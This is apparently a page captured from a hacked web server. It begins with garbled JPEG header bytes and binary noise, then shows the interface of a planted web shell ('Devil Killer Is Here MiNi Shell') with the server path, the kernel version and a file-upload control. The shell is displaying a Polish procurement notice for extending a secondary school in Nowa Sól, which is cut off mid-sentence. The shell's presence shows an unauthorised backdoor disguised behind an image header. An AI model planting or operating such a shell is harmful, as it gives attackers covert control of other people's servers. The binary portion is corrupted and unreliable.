JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220303/0007382501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> 5. Rozbudowa o część sanitarną i windę zewnętrzną budynku LO w Nowej Soli </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT NOWOSOLSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770103</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">MONIUSZKI 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Sól</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@powiat-nowosolski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat-nowosolski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> 5. Rozbudowa o część sanitarną i windę zewnętrzną budynku LO w Nowej Soli </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-45443c15-9ac4-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00073825</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00017449/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Rozbudowa o część sanitarną i windę zewnętrzną budynku LO w Nowej Soli</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/sp_nowasol <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/sp_nowasol<br/>1. Zasady komunikacji<br/>1) Komunikacja w niniejszym postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcami, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2) Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/sp_nowasol<br/>3) W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.Pozostałe informacje - Rozdz.XII SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz. U. z 2017 r. poz. 1320; dalej: “Rozporządzenie w sprawie środków komunikacji”), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2<br/>GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2) Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>3) Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie<br/>brana pod uwagę w przedmiotowym<br/>postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>4) Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>5) Osobą uprawnioną do komunikowania się w zakresie zagadnień związanych z prowadzoną procedurą jest Elżbieta Wasik lub osoba ją zastępująca. 3. Rekomendacje<br/>1) Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do “Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych<br/>wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych”, zwanego dalej Rozporządzeniem KRI.<br/>2) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf .<br/>3) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>rozszerzeń:<br/>a) .zip<br/>b) .7Z<br/>4) Wśród rozszerzeń powszechnych a niewystępujących w Rozporządzeniu KRI występują: .rar .gif<br/>.bmp .numbers<br/>.pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>5) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi maksymalnie 5MB.<br/>Pozostałe informacje zawiera SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Państwa danych osobowych jest Starostwo Powiatowe w Nowej Soli .<br/>Kontakt z administratorem:<br/>1. Osobiście, w siedzibie Starostwa Powiatowego w Nowej Soli<br/>2. telefonicznie: 68 458 68 00<br/>3. pisemnie: Starostwo Powiatowe w Nowej Soli, ul. Moniuszki 3, 67 100 Nowa Sól lub na adres poczty elektronicznej: poczta@powiat-nowosolski.pl <br/>Inspektor Ochrony Danych<br/>W Starostwie Powiatowym w Nowej Soli został wyznaczony Inspektor Ochrony Danych, z którym można się skontaktować za pomocą poczty elektronicznej: iod@powiat-nowosolski.pl<br/>Cele przetwarzania, czas przechowywania poszczególnych kategorii danych, podanie danych<br/>Dane będą przetwarzane przez Starostwo Powiatowe w Nowej Soli w celu związanym z postępowaniem o udzielenie zamówienia publicznego zgodnie z art. 6 ust. 1 lit. c) i e) RODO na podstawie:<br/>• Ustawy z dnia 11 września 2019 r. prawo zamówień publicznych<br/>Dane będą przechowywane przez okres 4 lat od zakończenia postępowania o udzielenie zamówienia,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>Odbiorcy danych<br/>Dane mogą zostać udostępnione osobom lub podmiotom, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych. Prawa osoby, której<br/>Przysługujące prawa:<br/>dane dotyczą<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych;− na podstawie art. 16 RODO prawo do sprostowania;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>Prawa nie mające zastosowania:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania \ danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IF.272.5.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest rozbudowa o część sanitarną i windę zewnętrzną budynku LO w Nowej Soli. Inwestycja dofinansowana ze środków Rządowego Funduszu Inwestycji Lokalnych.<br/>2. Obiekt objęty opracowaniem położony jest na działce numer ewidencyjny 720/3 w obrębie 0002 Nowa Sól przy ul. Gimnazjalnej 9 w Nowej Soli. Celem projektu jest rozbudowa budynku Liceum Ogólnokształcącego im. K. K. Baczyńskiego o część sanitarną i windę zewnętrzną oraz wykonanie kompleksowego remontu istniejących w piwnicy toalet – męskiej i damskiej.. Szczegółowy przedmiot zamówienia, zakres i sposób wykonania precyzują dokumenty, stanowiące załączniki do SWZ tj. :<br/>a) Dokumentacja projektowa,<br/>b) Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych ( STWiOR) ;<br/>c) Pozwolenie na budowę nr 978/2021 z dnia 01.12.2021r. ( znak sprawy :<br/>AB.6740.930.2021.KG ) ;<br/>d) Postanowienie nr 2/2022 z dnia 03.01.2022r. (znak sprawy : AB.6740.930.2021.KG);<br/>e) Decyzja Lubuskiego Wojewódzkiego Konserwatora Zabytków z dnia 16.11.2021r. ( znak: ZN.5142.8.2021 [mNSo];<br/>f) przedmiary robót;<br/>g) projekt umowy.<br/>Uwaga: <br/>Ww. dokumenty są dokumentami wzajemnie się uzupełniającymi. Wszystkie roboty budowlane i inne czynności ujęte odpowiednio w projekcie technicznym, specyfikacji technicznej wykonania i odbioru robót budowlanych i/lub w przedmiarach robót, i/lub w umowie, winny być traktowane tak, jakby były ujęte w każdym z wymienionych dokumentów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45223110-0 - Instalowanie konstrukcji metalowych</p> <p class="mb-0">45262311-4 - Betonowanie konstrukcji</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45442000-7 - Nakładanie powierzchni kryjących</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane oraz zastosowane materiały , urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają minimalne warunki<br/>udziału w<br/>postępowaniu umożliwiające ocenę zdolności Wykonawcy do należytego wykonania<br/>zamówienia dotyczące :1) zdolności technicznej ( w zakresie doświadczenia ) umożliwiającej realizację zamówienia na<br/>odpowiednim<br/>poziomie jakości tj. w okresie ostatnich 5 lat ( licząc wstecz od dnia upływu terminu składania<br/>ofert ) , a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie:<br/>▪ roboty budowlane porównywalne z robotami budowlanymi stanowiącymi przedmiot<br/>zamówienia tj.<br/>co najmniej jedno zadanie o minimalnej wartości 1 000 000,00 zł brutto w zakresie modernizacji<br/>i/lub<br/>przebudowy i/lub remontu, w budynku użyteczności publicznej<br/>Uwaga!!!<br/>Zgodnie z par. 3 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 roku w sprawie<br/>warunków<br/>technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. 2002.75.690 ze zm.)<br/>przez<br/>budynki użyteczności publicznej należy rozumieć budynek przeznaczony na potrzeby<br/>administracji<br/>publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego,<br/>nauki,<br/>wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii,<br/>usług, w<br/>tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w<br/>transporcie<br/>kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek<br/>przeznaczony do<br/>wykonywania podobnych funkcji. Jednocześnie zastrzeżono, że za budynek użyteczności<br/>publicznej uznaje<br/>się także budynek biurowy lub socjalny.<br/>Zamawiający uzna za spełnione warunki pkt 1 również w przypadku, gdy doświadczenie<br/>posiadane przez<br/>Wykonawcę obejmuje szerszy zakres i wartość robót od wymaganych w pkt 1 - Zamawiający<br/>wymaga, aby<br/>w wykazie robót (wg załącznika nr 7 do SWZ) wyodrębnione zostały wartość i zakres<br/>wykonanych robót<br/>spełniających wymagania pkt 1, które Wykonawca wykonał w ramach innych wielozakresowych<br/>zadań;<br/>Jeżeli Wykonawca powołuje się na doświadczenie zdobyte w realizacji robót budowlanych<br/>wykonanych<br/>wspólnie z innymi Wykonawcami Zamawiający uzna za spełnione warunki pkt 1, gdy wymagany<br/>zakres<br/>robót budowlanych został faktycznie wykonany przez Wykonawcę, a nie jego współpartnera lub<br/>współpartnerów - Zamawiający wymaga, aby w wykazie robót (wg załącznika nr 7 do SWZ)<br/>podane zostały<br/>wyłącznie jego wartość i zakres robót budowlanych, w których wykonaniu Wykonawca<br/>bezpośrednio<br/>uczestniczył;<br/>Zamawiający nie dopuszcza sumowania wartości kilku zadań celem uzyskania wymaganego<br/>warunku<br/>kwotowego, o którym mowa w pkt.1 .<br/>W przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o zamówienie<br/>Zamawiający<br/>uzna za spełniony niniejszy warunek, gdy współpartner, który posiada wymaganedoświadczenie, wykona<br/>co najmniej zakres przedmiotu zamówienia określony w pkt 1.<br/>2) zdolności zawodowej ( w zakresie personelu ) umożliwiającej realizację zamówienia na<br/>odpowiednim<br/>poziomie jakości tj. do realizacji zamówienia publicznego skierowane zostaną przez Wykonawcę<br/>osoby<br/>posiadające niezbędne do wykonania zamówienia uprawnienia zgodnie z ustawą Prawo<br/>budowlane:<br/>a) kierownikiem budowy - osobą z uprawnieniami budowlanymi do kierowania robotami<br/>budowlanymi,<br/>w specjalności konstrukcyjno – budowlanej bez ograniczeń lub odpowiadające im ważne<br/>uprawnienia<br/>budowlane, które zostały wydane na podstawie wczesnej obowiązujących przepisów,<br/>przynależącym do<br/>Izby Inżynierów Budownictwa oraz posiadających staż pracy minimum dwa lata na stanowisku<br/>Kierownika Budowy, pełniącego tę funkcję w zakresie odpowiadającym co najmniej wymaganym<br/>uprawnieniom określonym powyżej;<br/>b) 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w<br/>rozumieniu<br/>ustawy Prawo Budowlane;<br/>c) 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych<br/>i kanalizacyjnych.<br/>Uwaga!!!<br/>Zamawiający dopuszcza by jedna (ta sama) osoba łączyła w sobie kompetencje wymagane w<br/>punktach<br/>powyżej.Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych,<br/>dopuszcza<br/>odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państw<br/>Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.<br/>12a oraz<br/>innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2021<br/>r. poz.<br/>1646); <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z dyspozycją przepisu art. 273 ust. 1 pkt 1 ustawy Pzp, Zamawiający nie będzie wymagał<br/>złożenia w<br/>niniejszym postępowaniu podmiotowych środków dowodowych na potwierdzenie braku podstaw do<br/>wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">ch środków dowodowych na potwierdzenie spełniania warunków<br/>udziału w postępowaniu: 1) Wykaz robót budowlanych wykonanych nie<br/>wcześniej niż w okresie ostatnich 5 lat ( liczonychwstecz od dnia upływu składania ofert) , a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości, daty, miejsca<br/>wykonania oraz 